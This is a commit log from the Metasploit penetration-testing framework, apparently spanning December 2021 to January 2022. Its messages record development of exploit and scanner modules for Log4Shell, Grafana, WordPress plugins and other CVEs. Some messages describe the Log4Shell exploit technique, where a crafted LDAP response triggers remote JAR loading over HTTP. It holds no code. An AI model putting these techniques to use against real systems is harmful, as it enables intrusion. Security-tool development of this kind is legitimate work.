Spencer McIntyre 6b64985328 Add Windows support for symlink checks 2022-01-07 09:43:37 -05:00
sjanusz 21beb58ffb Add command to kill all Meterpreter channels 2022-01-07 12:12:14 +00:00
Christophe De La Fuente 59de13be43 Do not call File.expand_path() with empty strings 2022-01-07 13:09:47 +01:00
usiegl00 3051c5d9f5 Add mutex to cleanup in smb_shadow
The mutex will prevent multiple calls to cleanup when the module is
stopped with Ctrl-C. Add a Notes section to the documentation which
describes arpspoof usage and such.
2022-01-07 14:18:15 +09:00
bwatters f17d460a7a Remove now unused deregister_tcp_options method 2022-01-06 15:48:24 -06:00
bwatters b7fcb8951f Rubocop changes 2022-01-06 15:45:59 -06:00
Spencer McIntyre 41b2bc4fac Fix the generate command's tab completion 2022-01-06 15:15:49 -05:00
Spencer McIntyre 30e1b6ee81 Add tests for deleting directories and symlinks 2022-01-06 15:07:48 -05:00
Spencer McIntyre b3862ac95c Build a larger tree for testing directory removal
Add a subdirectory with it's own subfile to ensure that the directory
and its contents are removed in a truly recursive manner.
2022-01-06 15:07:48 -05:00
Spencer McIntyre 311e189c90 Update post/test/file to check directory deletion 2022-01-06 15:07:48 -05:00
Spencer McIntyre c154130832 Land #16026, Pin gems impacted by Ruby 2.5 EOL 2022-01-06 15:04:41 -05:00
adfoster-r7 d063c5209e Pin gems impacted by ruby 2.5 being end of lifed 2022-01-06 19:18:08 +00:00
Metasploit 0234b89c9c Bump version of framework to 6.1.24 2022-01-06 12:05:06 -06:00
VanSnitza 94182b1d1a resolve msftidy warning and adding option for dumping resonse telegrams 2022-01-06 18:50:47 +01:00
space-r7 27ad15d040 Land #16015, fix tab completion for RHOSTS 2022-01-06 10:44:33 -06:00
dwelch-r7 d49d823bf5 Land #15923, Add initial Metasploit docs site 2022-01-06 13:02:24 +00:00
VanSnitza 9ac90539d9 Adding Modbus Service Device ID 0x2B
Modbus specification usually requires devices to implement Command 0x2B which give clear text info about a device. Some real world devices implement it others don't .
2022-01-06 13:52:55 +01:00
adfoster-r7 7e7998c258 Add Sanitizing PCAPs file 2022-01-06 11:07:13 +00:00
adfoster-r7 1114f831df Use Rapid7 fork for just-the-docs 2022-01-06 10:59:29 +00:00
usiegl00 cf6ab21467 Fix disabling of port 445 forwarding in smb_shadow
Update the iptables invocation to use the FORWARD table, which filters
packets being routed through the device. Add check for STATUS_PENDING
response from the server while creating the service.
2022-01-06 13:15:30 +09:00
bwatters 809dc1754d Fix the bug 2022-01-05 16:57:17 -06:00
lap1nou c9cc6d85ac Refactored code by using Zabbix HTTP API, should work with 2.x, 3.x, 4.x, 5.x 2022-01-05 13:35:40 -08:00
Spencer McIntyre 4b37076bd4 Unify completion for OptAddressRange and OptRhosts 2022-01-05 14:11:43 -05:00
Metasploit 4d8e10e09a automatic module_metadata_base.json update 2022-01-05 12:48:00 -06:00
Spencer McIntyre 1e0d9af9d8 Fix tab completion for RHOSTS 2022-01-05 13:43:34 -05:00
Spencer McIntyre d0417f60bd Land #15924, Updates to Windows Secrets Dump 2022-01-05 13:25:59 -05:00
Christophe De La Fuente f3f6f93e23 Fix sanity check failing on specific Ubuntu versions 2022-01-05 18:26:19 +01:00
Christophe De La Fuente 087f18c828 Pull new ruby_smb version 2022-01-05 15:25:04 +01:00
3V3RYONE c47ea05d2a make msf_cmd syntax more maintainable 2022-01-05 10:47:58 +05:30
3V3RYONE 30b1b4f47e normalize msf_cmd syntax 2022-01-05 10:08:11 +05:30
Metasploit c34db4c7de automatic module_metadata_base.json update 2022-01-04 15:04:47 -06:00
space-r7 3ef9afb0fc Land #15988, add wp catch themes file upload 2022-01-04 14:44:06 -06:00
space-r7 e26eb2b193 display full path in print_status() 2022-01-04 14:43:04 -06:00
Spencer McIntyre cc2616b7cf Land #15982, Normalize smbuser to a string 2022-01-04 15:42:01 -05:00
h00die c6372ecdf1 more wp catch themes doc and error handling 2022-01-04 04:34:42 -05:00
lap1nou 6aa289f3dc Merged both module, stil WIP 2022-01-03 16:20:16 -08:00
Christophe De La Fuente 86acad0034 Update Gemfile to pull the new ruby_smb gem and add progress indicator 2022-01-03 21:39:54 +01:00
Christophe De La Fuente bb333df3e5 Update Gemfile.lock to pull new ruby_smb updates & fix some issues with Ruby 3 2022-01-03 21:39:54 +01:00
Christophe De La Fuente 8812d06f12 Temporarily update the Gemfile to use the new RubySMB updates 2022-01-03 21:39:54 +01:00
Christophe De La Fuente ae2e4d723b Add NTDS technique 2022-01-03 21:39:33 +01:00
Christophe De La Fuente da88388e01 Add actions 2022-01-03 21:39:33 +01:00
h00die 87031de384 fix doc numbering 2022-01-02 11:57:32 -05:00
h00die 8a1ac9d51d move pihole docs 2022-01-02 11:56:04 -05:00
h00die 990e4a1e7a pihole new module and lib 2022-01-02 11:48:41 -05:00
lapinou 7843b1bb99 Add files via upload 2022-01-02 00:30:07 +01:00
lapinou 18834f673c Add files via upload 2022-01-02 00:29:36 +01:00
h00die c3e0f455ec some cleanup for rubocop 2021-12-30 15:35:22 -05:00
Metasploit ca3c80102a Bump version of framework to 6.1.23 2021-12-30 12:11:12 -06:00
RageLtMan 5eb2c3233d Authors cleanup 2021-12-29 10:56:44 -05:00
RageLtMan 4f8448c3ba Implement infrastructure for ysoserial payload
Pull in the ysoserial mixin and create target configurations to
permit ysoserial payload generation. Setup datastore options and
execution flow to manage the remote code loading workflow vs the
deserialization approach.

The buffer produced by ysoserial still needs to be marshalled into
a valid Java String or Stream of some sort, and verified functional
against the PoC target container using public ysoserial libraries.
2021-12-29 09:10:07 -05:00
RageLtMan ec03b57f6f Rubocop: dont suppress exception 2021-12-29 09:10:07 -05:00
RageLtMan bcdaf53fa1 Rubocop pass on exploit module 2021-12-29 09:10:07 -05:00
RageLtMan 4f07a2fbea First "working" 2021-44228 exploit module state
Clean up the Java code for PayloadFactory - the `main()` function
is actually not required, the error seen on initial attempts to
compile was some sort of PEBKAC or weird things in classpaths.

Update the module to start the HTTP server before issuing the HTTP
request starting the call chain which eventually executes the Java
PayloadFactory - that chain is quick and races with the service's
startup time to get the JAR containing the Payload and its factory.

Minor misc cleanup.
Give credit where due: we stand on the shoulders of giants.

Testing:
  LDAP request is serviced with response containing our JAR URL and
trigger parameters for the factory to instantiate Payload.class and
call its `main()` function.
  HTTP request is serviced to deliver the JAR.
  Payload handler on MSF-side is tripped with incoming connection.
2021-12-29 09:10:07 -05:00
RageLtMan 4874943e7f Implement infrastructure for payload delivery
Per the discussion with @schierlm on GitHub (mihi), the most direct
way to deliver and instantiate our Java payload in the target is
via remote code loading of the JAR using HTTP. This requires a
bootstrap class, a Factory, which instantiates our Payload.class
by calling its main() function on-load from the HTTP endpoint
serving the remote-code-loaded JAR.

Implement a basic PayloadFactory class and include and its sources
in the Metasploit tree.

Using @schierlm's own code from ~10y ago, implement injection of
the PayloadFactory class into our JAR-encoded payloads. Then,
using more of his code from the same module (2011-3544), implement
a secondary service within the exploit module (Rex::ServiceManager
services don't stack well in Msf namespace as they all get assigned
to self.service - faux pas on our end) to serve HTTP requests with
the injected JAR. Finally, generate an appropriate URL target for
the remote code loaded JAR for injection into the LDAP response and
leveraging a final piece of @schierlm's hackery, generate a valid
URI path (updating the datastore is ill advised @ runtime, but its
needed here for the correct service cleanup routines to fire).

Note: during development, i figured out a way to use Rjb for native
Java object serialization to buffers which we can use in Ruby, so i
stashed that away in the Exploit::Java mixin for posterity and left
a reference to it in the module for future endeavors.

Testing:
  Verified that the generated jar is served at the generated URL
  Verified that the generated JAR can be executed at the CLI for
both metasploit.Payload and metasploit.PayloadFactory
  Currently not triggering the remote code load (per wireshark and
our own HTTP service) when delivering the LDAP response, so tuning
that is the next leg of this effort.
2021-12-29 09:10:07 -05:00
RageLtMan feed54b3ae Cleanup 2021-12-29 09:10:07 -05:00
RageLtMan aa6c977423 Leverage Rjb to serialize payload "natively"
After evaluating a Rex::Java::Serialization::Model::Stream.decode
of a StringIO containing a natively-produced byteArray serialized
Java class, it looks to be quite time consuming to produce a native
construct from the JARs we currently generate - this requires some
lower-level intervention in the payload generation process and a
considerable amount of data & reference organization.

Since time is limited, and such a construct is devilishly difficult
to proof when bulding out-of-band (in a different language), this
commit takes a different direction: attempting to leverage the Ruby
Java Bridge gem to implore Java itself to construct the serialized
data structure and marshal it back into Ruby for our disposition.

Split the :serialized_payload method to build the actual byteArray
payload in :byte_array_payload which encapsulates the Rjb interface
and produces a valid output to the LDAP packet crafting routine in
:serialized_payload (as read on the wire and by the JVM on the
target container).

Unfortunately, another problem exists here - the metasploit.Payload
class raises: #<NotSerializableException: metasploit.Payload>.
This will likely need to be addressed in the payloads repository.
Once the metasploit.Payload can be successfully serialized by Rjb,
the wire format should accept it verbatim for delivery on-target.
2021-12-29 09:10:07 -05:00
RageLtMan 642c79f633 Shim test hardness with pre-serialized b64 payload
Using Java:
1. Build a test class which prints to the console on init
and ctor
2. Build a serializer for the test class which writes the byteArray
representation of the serialized class to a file
3. Build, run, produce the serialized output and b64 encode it
4. Embed the serialized data into our exploit during development to
avoid construction problems for the Rex encoder of those structures
and my lack of experience using them.
5. TODO: use the embedded Java-produced serialized data to tweak
native structure composition from the raw Java class output.

This is still not working, as just natively writing out the Java
byte array produces an ASN.1 decoding error on the exploitation
target whereas the curent implementation producing EOF errors from
the target system. Wireshark is complaining, so its likely to be
an LDAP structuring issue: the protocol should be using tag 4 which
represents an octet string but the wire data has tag 2 since i was
encoding each byte to BER. Adding octal encoding to the byte array
and encoding each char of that to BER makes the LDAP packet legal
but still results in a `javax.naming.NamingException [Root
exception is java.io.EOFException]`

Leaving this here for folks to hack on while i execute work tasks.
2021-12-29 09:10:07 -05:00
RageLtMan 30d564f8cb Attempt to serialize the Java payload class
Delivery of the raw payload class bytes and ber-encoded payload do
not produce actionable results. Java-based PoCs appear to pass a
byteArray to their LDAP crafting scheme, although the subsequent
BER encoding appears to be opaque or not exist.

Rex::Java::Serialization appears to provide a mechanism by which to
build a Java byteArray in native Rex.
Implement naive NewArray construction, and encode the bytes of that
array per LDAP protocol specification as otherwise the server will
throw an ASN.1 decoding error.

This is still not producing a session, but may be closer to the
solution. So far not even the simple class built as suggested by
@schierlm is executing correctly in the target Docker container,
meaning that the decoded LDAP response packet is not being loaded
or not referencing something correctly.
2021-12-29 09:10:07 -05:00
RageLtMan 9e3e9fd0e2 Implement LDAP attributes or Java payload
Per @shierlm's suggestion, implement the LDAP JNDI hooks required
for an LDAP response to trigger code load.

Payload serialization is wrong however, and my `rex-java` is not
great. It looks like there is a serializer in there containing a
`new_class` method - looks promising, but quick greps through Msf
modules aren't giving me a clear path to encode a generated payload
class this way.

Testing: wireshark says the packet is legal
2021-12-29 09:10:07 -05:00
RageLtMan 074120a2d3 Scaffold HTTP Header Injection Exploit
Using the infrastructure developped for use in the log4shell HTTP
scanner, implement a basic HTTP exploit module which performs the
same action as the scanner does per-host on a specific target; but
instead of logging the vulnerability, return a crafted LDAP search
response containing the payload encoded within the search response.

The crux of this effort lies in payload generation, specifically in
crafting the legal LDAP response packet out of the request data and
generated JAR-format payload. The payload selection is based on an
offline discussion with @Mihi during which he indicated JNDI's
ability to load JARs in the same way as raw Java classes. This
assumption/interpretation on my part may be incorrect.

At present, the delivered LDAP search response appears to be valid
in WireShark, and the vulnerable test docker is showing internal
values in its console output a la:
```
Received a request for API version com.sun.jndi.ldap.LdapCtx@3575a
```
which shows that it is processing the response on its end, just
not in the way we would prefer, yet.

This may be a result of how the MSF payload is being shuffled and
mutated by the packet construction method, or a mistake in the way
i pass in the queried base DN or execute the LDAP search response
transaction.

Testing: fails currently for aforementioned reason

TODO:
  figure out how to encode the payload/LDAP response correctly
  continue testing until verified and upstreamed
2021-12-29 09:10:07 -05:00
Metasploit f1226cce5c automatic module_metadata_base.json update 2021-12-28 14:09:38 -06:00
Spencer McIntyre d08714d474 Land #15961, Initial Rex LDAP Server 2021-12-28 14:50:03 -05:00
Spencer McIntyre d82b9ecb47 Add module docs for the ldap server module 2021-12-28 13:52:12 -05:00
Spencer McIntyre 0b5dd2d552 Land #16003, expand version to 3.0.3
Land #16003, expand version to 3.0.3 until 3.1 is handled correctly by GitHub actions.
2021-12-28 10:50:39 -05:00
Jeffrey Martin aad35abff2 expand version to 3.0.3 until 3.1 is handled 2021-12-28 09:22:17 -06:00
Metasploit c1554bc7be automatic module_metadata_base.json update 2021-12-28 08:44:45 -06:00
Jeffrey Martin 90df765fe2 Land #15986, bash_profile_persistence: Add notes 2021-12-28 08:23:58 -06:00
usiegl00 204da6a0b4 Use packet filter anchor for pfctl in smb_shadow
The packet filter anchor will prevent the flushing of previous packet
filter rules. Using an anchor also allows us to remove the rule, instead
of disabling the filter.
2021-12-28 20:13:32 +09:00
h00die d8255978ac Wordpress Plugin Catch Themes Demo Import cve-2021-39352 2021-12-24 11:56:51 -05:00
Brenton O'Loughlin e0d0514814 relocate status output 2021-12-24 17:51:04 +07:00
Tim W 5631959eff Fix #12895, fix console.read does not return command output 2021-12-24 07:51:25 +00:00
Tim W 647a73fd47 Land #15990, revert fix command output in rpc console.write 2021-12-24 07:33:31 +00:00
Tim W b1922c305b Revert "Land #15941, fix command output in rpc console.write"
This reverts commit 8d808d11c0, reversing
changes made to c1f06eace8.
2021-12-24 07:32:29 +00:00
Brendan Coles 5d010fcd25 bash_profile_persistence: Add notes and resolve rubocop violations 2021-12-24 03:06:37 +00:00
Metasploit a0de825f17 automatic module_metadata_base.json update 2021-12-23 15:20:27 -06:00
bwatters b8137d552c Land #15059, Add ManageEngine ServiceDesk Plus CVE-2021-44077 exploit
Merge branch 'land-15950' into upstream-master
2021-12-23 15:00:48 -06:00
bwatters 6ed8e317f7 Land #15984, fix snmp library to run correct version
Merge branch 'land-15984' into upstream-master
2021-12-23 13:12:49 -06:00
William Vu d55af3aa00 Add module doc 2021-12-23 12:27:57 -06:00
William Vu 4cd83b5e72 Add ManageEngine ServiceDesk Plus CVE-2021-44077 2021-12-23 12:27:57 -06:00
Tim W f9c92baf27 Revert "Land #15941, fix command output in rpc console.write"
This reverts commit 8d808d11c0, reversing
changes made to c1f06eace8.
2021-12-23 18:14:53 +00:00
Metasploit 8757971193 Bump version of framework to 6.1.22 2021-12-23 12:10:50 -06:00
RageLtMan 25e2fbd640 Do not redefine constant 2021-12-21 22:36:51 -05:00
h00die 4e0fc5a4e5 Wordpress Plugin Catch Themes Demo Import cve-2021-39352 2021-12-21 20:04:09 -05:00
Metasploit b651c81221 automatic module_metadata_base.json update 2021-12-21 15:44:29 -06:00
bwatters 1619083834 Land #15955, BYOVD to Enable/Disable Windows Memory Protection
Merge branch 'land-15955' into upstream-master
2021-12-21 15:21:23 -06:00
Grant Willcox 9af9b4277d Remove extra "or" from sentence 2021-12-21 11:47:02 -06:00
Grant Willcox 8c6cd41ff0 Update exploit ranking info to be clearer to end users on the difference between our different ranks. 2021-12-21 11:45:16 -06:00
Tim W 8d808d11c0 Land #15941, fix command output in rpc console.write 2021-12-21 06:07:29 +00:00
h00die 1931bfab7b fix snmp library to run correct version 2021-12-20 16:28:01 -05:00
Metasploit c1f06eace8 automatic module_metadata_base.json update 2021-12-20 10:13:40 -06:00
bwatters 6727c1b344 Land #15954, Add Grafana file read (CVE-2021-43798)
Merge branch 'land-15954' into upstream-master
2021-12-20 09:54:15 -06:00
Metasploit 90a280deba automatic module_metadata_base.json update 2021-12-20 09:49:01 -06:00
bwatters 2705d6ae94 Land #15948, Wordpress wp_popular_posts rce
Merge branch 'land-15948' into upstream-master
2021-12-20 09:28:23 -06:00
h00die ea836c2f41 update PR template w/ pcap sanitization 2021-12-19 16:27:55 -05:00
h00die 01c2891077 Created Sanitizing PCAPs (markdown) 2021-12-19 16:27:08 -05:00
h00die cb348f06c4 move grafana plugins out to data 2021-12-19 16:18:05 -05:00
h00die eb723098ce report which plugin was successful 2021-12-19 15:56:30 -05:00
3V3RYONE 56b19e5e9b Fix exploit session crashing when unsetting smbuser or smbpass 2021-12-19 19:02:17 +05:30
Jake Baines e7810acb1e Pulled offsets out of dll into module. Auto-find lsass.exe when pid is 0 2021-12-18 10:56:46 -08:00
RageLtMan 60fdf2a7da Rubocop pass on LDAP pieces 2021-12-18 09:03:56 -05:00
RageLtMan 0e90c3e573 Address @adfoster-r7's change requests
Due to how this stack is being broken up into LDAP core, scanner
update, and exploit work, changes requested in #15972 actually
apply in this branch and get rebased to the remaining ones.

Address requests to clean up the textual messages, LDIF file read,
sourcing of LDAP methods from net-ldap, and YARD-related placement
of attr_* annotations.
2021-12-18 07:52:33 -05:00
Metasploit 69e67db135 automatic module_metadata_base.json update 2021-12-17 15:55:33 -06:00
bwatters de815f1633 Land # 15976, Update Log4Shell references and VCenter URI
Merge branch 'land-15976' into upstream-master
2021-12-17 15:35:45 -06:00
Spencer McIntyre 60de839b60 Update Log4Shell references and VCenter URI 2021-12-17 15:55:02 -05:00
Jake Baines 78cae04db6 Merge branch 'rapid7:master' into dell_protect 2021-12-17 12:29:32 -08:00
RageLtMan 0cb381e35d Address the easy parts of @zeroSteiner's review 2021-12-16 19:32:04 -05:00
RageLtMan f8902321ba Update log4shell scanner with native LDAP service
Implement the new Rex::Protocol::LDAP::Server to handle log4shell
callbacks from vulnerable hosts.
2021-12-16 19:20:03 -05:00
RageLtMan db8f4ffa6f Native LDAP infrastructure to support log4shell
In order to detect scan callbacks, serve payloads, and otherwise
interact with the LDAP protocol handler in JNDI, Metasploit needs
a native LDAP service properly exposed to various parts of the
Framework and users/consumers.

Implement Rex::Protocol::LDAP::Server with TCP and UDP socket
handlers abstracted to a common access pattern between L4 stacks.
Extend the socket clients to hold a state attibute for LDAP bind
authentication, and use the UDP client abstraction to implement
consistent callback semantics for data receipt from a client and
handling response on the other side. The server utilizes Rex'
native sockets, permitting full pivot and proxy support over the
Switchboard.

Implement the Msf::Exploit::Remote::LDAP::Server mixin to manage
service abstraction and shared methods exposed to Metasploit
modules.
Note: during implementation of this functionality, it was
discovered that the Scanner mixin's :replicant method resulted in
:dup calls to the Rex::ServiceManager service created by this new
mixin (and any others leveraging ServiceManager). As a result,
double-bind attempts created failures in service instantiation from
the duplicated MetasploitModules which also dropped the @service
instance variable reference to the actual running service; leaving
the socket inexorably bound until Framework was halted and Ruby
released the FDs. See https://github.com/rapid7/rex-core/pull/19
and the Issues/Pull Requests sections of R7's MSF GitHub.

Expose the new LDAP infrastructure to users by way of a basic LDAP
server MetasploitModule which consumes a tiny sample LDIF (provided)
and performs queries against it. This is intended to be a template
for future work such as LDAP authentication capture, protocol proxy
for MITM and intercept, and other more specific implementations for
exploits and auxiliary modules.

For feature completeness, provide a Rex::Socket override for
Net::LDAP::Connection until we have a proper, native to Rex, LDAP
client class implemented.

Testing:
  Basic functionality only, this is an early effort which will be
extended for feature-completeness over time
2021-12-16 18:47:52 -05:00
Metasploit 6175e38971 automatic module_metadata_base.json update 2021-12-16 15:59:59 -06:00
space-r7 184795513f Land #15831, add more ssh session support 2021-12-16 15:39:55 -06:00
Grant Willcox 5c2afd6750 Land #15882, Prevent payloads being used if can't clean up files 2021-12-16 15:05:27 -06:00
Metasploit f94c491d26 automatic module_metadata_base.json update 2021-12-16 14:39:38 -06:00
bwatters 1642f917ab Land #15964, Fix json packrat module
Merge branch 'land-15964' into upstream-master
2021-12-16 14:19:51 -06:00
Metasploit 5cd5d1449b Bump version of framework to 6.1.21 2021-12-16 12:22:49 -06:00
Grant Willcox 0ee427ddb9 Land #15965, Add tcp uri scheme for setting rhosts 2021-12-16 12:07:37 -06:00
Spencer McIntyre 9ade6c22a4 Land #15970, Update log4shell docs and option 2021-12-16 12:59:22 -05:00
Spencer McIntyre a2624f9309 Appease rubocop 2021-12-16 12:59:12 -05:00
adfoster-r7 f463c19f33 Update log4shell documentation and default uri file wordlist for scanning 2021-12-16 17:52:39 +00:00
Metasploit 168134f3df automatic module_metadata_base.json update 2021-12-16 11:05:03 -06:00
bwatters fd2f27aa94 Land #15958, Log4Shell HTTP Scanner
Merge branch 'land-15958' into upstream-master
2021-12-16 10:45:23 -06:00
Spencer McIntyre e6b7669114 Address PR feedback from module hacking 2021-12-16 11:12:11 -05:00
Grant Willcox 4cbc9113ae Land #15963, Support go 1.17 and remove startup errors for modules 2021-12-15 17:51:31 -06:00
Metasploit fb7f607a79 automatic module_metadata_base.json update 2021-12-15 17:35:23 -06:00
Grant Willcox 304648ea2e Land #15953, wps_hide_login module CVE-2021-24917 2021-12-15 17:13:29 -06:00
Grant Willcox ace37bd678 Fix up minor typo and add in additional instructions on how to install WordPress and a vulnerable version of the plugin 2021-12-15 17:12:51 -06:00
h00die e6d145241b fix file names in wp modules 2021-12-15 16:42:46 -05:00
h00die 8b914a6d71 grafana dir trav module and docs 2021-12-15 16:33:14 -05:00
Spencer McIntyre a73d842564 Check the host is responding before continuing 2021-12-15 16:11:26 -05:00
Spencer McIntyre 4cde008953 Add VMWare VCenter Log4Shell scan support 2021-12-15 15:13:46 -05:00
Grant Willcox 2e7e24a833 Land #15779, Add Nil-Check in Auxiliary report for vuln reporting 2021-12-15 11:52:48 -06:00
Spencer McIntyre a694381ab1 Allow templatized URIs 2021-12-15 11:58:41 -05:00
adfoster-r7 ca2f19cca3 Add explicit step for ensuring the user is in the right directory 2021-12-15 16:15:28 +00:00
adfoster-r7 503d3aa473 Ignore docs folder 2021-12-15 15:53:48 +00:00
Spencer McIntyre 9bdb34d964 Add a TIMEOUT option and fix reading lines 2021-12-15 10:47:29 -05:00
adfoster-r7 a373450b65 Add tcp uri scheme for setting rhosts 2021-12-15 15:37:05 +00:00
adfoster-r7 c3685641ab Fix json packrat module 2021-12-15 15:07:38 +00:00
adfoster-r7 f1427fd383 Land #15944, Add support and tests for long arguments to Rex Parser 2021-12-15 14:55:44 +00:00
Spencer McIntyre 5dc8fa34b8 Add module docs and validate SRVHOST is usable 2021-12-15 09:05:51 -05:00
Spencer McIntyre 3c88e30ade Fix a socket binding issue 2021-12-15 08:45:25 -05:00
Spencer McIntyre 476a51248d Add error handing for client connections 2021-12-15 08:45:25 -05:00
Spencer McIntyre 5e5e73a1d8 Add module metadata and more checks 2021-12-15 08:45:25 -05:00
Spencer McIntyre 725904c825 Support an input URI list for scanning 2021-12-15 08:45:25 -05:00
Spencer McIntyre 0bf355a191 Extract the java version as proof 2021-12-15 08:45:24 -05:00
Spencer McIntyre b06b96731d Support scanning multiple HTTP headers 2021-12-15 08:45:24 -05:00
Spencer McIntyre 50f0f3a5d0 Initial layout of a Log4Shell scanner 2021-12-15 08:45:24 -05:00
adfoster-r7 9c94a052bd Support go 1.17 and remove startup errors for modules 2021-12-15 13:45:10 +00:00
Matthew Dunn c6a84c912b Switch to a validation error 2021-12-15 07:13:29 -05:00
Matthew Dunn 608ced1a4b Add raise if vuln is nil instead of a print 2021-12-14 20:31:28 -05:00
Matthew Dunn cb385192b6 Merge branch 'rapid7:master' into nil_check_auxiliary_report 2021-12-14 20:15:13 -05:00
adfoster-r7 48ccb93b55 Code quality, linting, and ensuring new paths are alphanumeric 2021-12-15 00:24:03 +00:00
h00die 980230e5f1 wps_hide_login fixes and notes to other modules 2021-12-14 16:40:52 -05:00
h00die e8e5fe4a3e more grafana 2021-12-14 14:46:54 -05:00
sjanusz 063c3936a9 Add support for long arguments to Rex Parser 2021-12-14 17:45:56 +00:00
Grant Willcox fd6f2e183c Land #15936, Update tomcat_mgr_default_userpass.txt 2021-12-14 10:35:27 -06:00
Grant Willcox 4600ffa702 Land #15957, Print error when session ID is nil for Kiwi's creds_all 2021-12-14 09:28:08 -06:00
sjanusz 210f704a77 Print error when session id is nil for kiwi creds_all 2021-12-14 10:16:52 +00:00
Cristiano Maruti 0305983be2 Update tomcat_mgr_default_users.txt 2021-12-14 09:25:52 +01:00
Cristiano Maruti d1fb2a7bde Update tomcat_mgr_default_pass.txt 2021-12-14 09:25:00 +01:00
Tim cfd2d4d114 improve passthrough to capture stderr (#1) 2021-12-14 15:35:25 +11:00
Brenton O'Loughlin bb688e12b8 capture passthrough system command output to output handler 2021-12-14 15:35:25 +11:00
bwatters c4443577d0 Land #15841, Rubocop Packrat mixin, part 2
A commit happened between my checkout and my merge, this incorporates the lost commit

Merge branch 'land-15841' into upstream-master
2021-12-13 15:50:14 -06:00
bwatters 3d2e00f87d Land #15841, Rubocop packrat mixin 2021-12-13 15:42:13 -06:00
adfoster-r7 7f2d2c180b Rubocop Packrat mixin
Add linting exceptions for eval logic

wip
2021-12-13 19:36:26 +00:00
Grant Willcox cc18c8d4ab Land #15842, Add Meterpreter compatibility requirements to lib 2021-12-13 12:57:33 -06:00
adfoster-r7 48f40077ea Add get processes requirement 2021-12-13 13:46:54 +00:00
adfoster-r7 4c02405ab5 Ignore stdapi_fs_chmod requirement on windows 2021-12-13 13:06:02 +00:00
adfoster-r7 24bf9e5e61 Add Meterpreter compatibility requirements to lib 2021-12-13 11:30:32 +00:00
h00die a5dc2a4c5e grafana working module 2021-12-13 05:27:29 -05:00
h00die 950e976f7b Land #15952 fix for ntlm hashes crashing creds -d command 2021-12-13 05:00:51 -05:00
h00die 6c10ad460c wps_hide_login module 2021-12-11 14:25:07 -05:00
sjanusz acd55ea24f Fix creds crashing when deleting multiple ntlm hashes 2021-12-10 16:08:55 +00:00
Metasploit a4b9c883f7 automatic module_metadata_base.json update 2021-12-10 00:39:30 -06:00
Tim W e0d618b8a9 Land #15945, fix stat on inaccessible directory 2021-12-10 06:19:52 +00:00
Tim W d7ba48426d update payload cached sizes 2021-12-10 06:15:28 +00:00
Tim W bff3aa26d8 bump metasploit_payloads-mettle to 1.0.17 2021-12-10 06:06:07 +00:00
Tim W 4b1f901033 bump metasploit-payloads to 2.0.66 2021-12-10 06:02:18 +00:00
Cristiano Maruti 0a4e2b7c90 Update tomcat_mgr_default_pass.txt 2021-12-09 21:21:19 +01:00
Cristiano Maruti 8709b92966 Update tomcat_mgr_default_users.txt 2021-12-09 21:19:39 +01:00
Metasploit 26cde48c13 Bump version of framework to 6.1.20 2021-12-09 13:24:04 -06:00
Spencer McIntyre ad0dba9385 Display st_mode using 6 octal digits 2021-12-09 13:43:00 -05:00
Spencer McIntyre 82a22ad38c Skip empty stat buffers
This skips empty stat buffers, allowing Meterpreter to return empty ones
for entries that can not be stat'ed and thus maintain the array
alignment.
2021-12-09 13:43:00 -05:00
Jeffrey Martin 2a73117f82 release version update for Pro 4.21.0 2021-12-09 08:30:15 -06:00
Tim W 4696418089 Land #15939, Fix #15919, fix unpacking 64-bits stat buffers in meterpreter 2021-12-09 08:40:49 +00:00
Metasploit 859e84d363 automatic module_metadata_base.json update 2021-12-08 17:05:35 -06:00
Spencer McIntyre 1915b1395e Land #15742, Added module for CVE-2021-40444 2021-12-08 17:46:02 -05:00
Spencer McIntyre 2f6710e02e Remove the Not_Hosted target
It's not currently working and Metasploit should just handle everything
2021-12-08 17:22:44 -05:00
h00die 9d182e0994 update wordpress wordlists 2021-12-08 16:56:28 -05:00
Spencer McIntyre 75deb69eab Reformat the CVE-2021-40444 module docs 2021-12-08 16:45:22 -05:00
h00die 22ecedf135 wp_popular_posts_rce 2021-12-08 16:45:19 -05:00
Metasploit 6dfcc27230 automatic module_metadata_base.json update 2021-12-08 14:37:51 -06:00
Spencer McIntyre 6425470f7f Land #15946, Update metasploit-payloads to 2.0.65 2021-12-08 13:58:39 -05:00
Spencer McIntyre 410b276c3f Update metasploit-payloads gem to 2.0.65 2021-12-08 13:19:22 -05:00
bwatters 852230c739 Fix bug brought in by importing Msf::Post::File
Split out javascript to a file and deobfuscate it
Update documentation for new targets
Fix other small suggestions
2021-12-08 10:36:27 -06:00
Jake Baines deab4ce90e Initial commit of Dellicious port 2021-12-08 07:33:16 -08:00
Simon Janusz 46dc748bd0 Land #15905, Only normalize new/updated hosts after nmap import 2021-12-08 11:57:13 +00:00
adfoster-r7 3e1ba060a7 Land #15908, add reload functionality to the save command 2021-12-08 04:27:04 +00:00
Spencer McIntyre d94d2ff13c Fix unpacking 64-bit stat buffers from Meterpreter 2021-12-07 16:08:38 -05:00
Metasploit 38c7794118 automatic module_metadata_base.json update 2021-12-07 13:38:51 -06:00
space-r7 22d2ba599f Land #15929, add new targets for ms08-067 netapi 2021-12-07 13:16:23 -06:00
sjanusz 2b0cd6f169 Correct exception & save arg, inline deleting module config 2021-12-07 12:39:03 +00:00
adfoster-r7 2c1a60c3a5 Land #15888, Add database stats to debug command 2021-12-07 12:04:09 +00:00
Metasploit 6240a7c022 automatic module_metadata_base.json update 2021-12-07 05:21:00 -06:00
Christophe De La Fuente 389fd55952 Land #15808, Fix #15804 powershell read_file on Windows Server 2012 2021-12-07 11:59:11 +01:00
usiegl00 609bf4be3c Update smb_shadow module to clean unnecessary code
Remove the return statement after fail_with which will never be reached.
Add documentation for the module options. Reset the packet forwarding
settings during the module cleanup.
2021-12-07 08:41:52 +09:00
Grant Willcox f0841c8fb9 Land #15933, Add April fools module help banner 2021-12-06 15:59:07 -06:00
Metasploit 44a3a6cbe4 Bump version of framework to 6.1.19 2021-12-06 12:18:28 -06:00
Jeffrey Martin aebd989883 Land #15937, Remove references to Sorted Set 2021-12-06 12:00:46 -06:00
adfoster-r7 abd8ad6fa2 Remove references to Sorted Set 2021-12-06 16:01:01 +00:00
sjanusz f60611c070 Fix failing tests 2021-12-06 15:04:05 +00:00
Cristiano Maruti 6c52cc6402 Update tomcat_mgr_default_userpass.txt 2021-12-06 15:33:00 +01:00
sjanusz f9c9df4463 Fix delimited workspace ids 2021-12-06 12:19:33 +00:00
sjanusz 1ba8aa8dcd Delete bad test, remove delete_all before each test 2021-12-06 11:35:18 +00:00
sjanusz eadf965e83 Add QoL features for loading, reloading and deleting saved options 2021-12-06 10:26:57 +00:00
